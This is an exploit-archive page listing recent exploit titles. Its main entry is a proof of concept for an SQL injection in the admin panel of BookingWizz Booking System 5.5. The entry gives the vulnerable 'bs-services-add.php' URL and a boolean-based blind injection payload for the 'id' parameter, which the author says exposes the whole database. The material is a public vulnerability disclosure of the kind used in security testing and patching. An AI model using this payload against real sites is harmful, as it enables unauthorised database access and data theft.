
11 changes to exploits/shellcodes Werewolf Online 0.8.8 - Information Disclosure Bitmain Antminer D3/L3+/S9 - Remote Command Execution Wordpress Plugin Events Calendar - SQL Injection / Cross-Site Scripting Ingenious School Management System - 'id' SQL Injection Sharetronix CMS 3.6.2 - Cross-Site Request Forgery / Cross-Site Scripting Lyrist - 'id' SQL Injection BookingWizz Booking System 5.5 - 'id' SQL Injection Listing Hub CMS 1.0 - SQL Injection ClipperCMS 1.3.3 - Cross-Site Scripting My Directory 2.0 - SQL Injection / Cross-Site Scripting Baby Names Search Engine 1.0 - 'a' SQL Injection
24 lines
No EOL
884 B
Text
24 lines
No EOL
884 B
Text
# Exploit Title: BookingWizz Booking System 5.5 - 'bs-services-add.php' SQL Injection
|
|
# Dork: N/A
|
|
# Date: 27.05.2018
|
|
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
|
|
# Vendor Homepage: https://codecanyon.net/item/booking-system/87919
|
|
# Version: 5.5
|
|
# Category: Webapps
|
|
# Tested on: Kali linux
|
|
# Description : The service editing on the admin panel is vulnerable.
|
|
An attacker can exploit the entire database using this vulnerable in the
|
|
'id' parameter.
|
|
====================================================
|
|
|
|
# PoC : SQLi :
|
|
|
|
http://www.site.com/booking/bs-services-add.php?id=2
|
|
|
|
Parameter: id (GET)
|
|
Type: boolean-based blind
|
|
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
|
|
Payload: id=(SELECT (CASE WHEN (6769=6769) THEN 6769 ELSE 6769*(SELECT
|
|
6769 FROM INFORMATION_SCHEMA.PLUGINS) END))
|
|
|
|
==================================================== |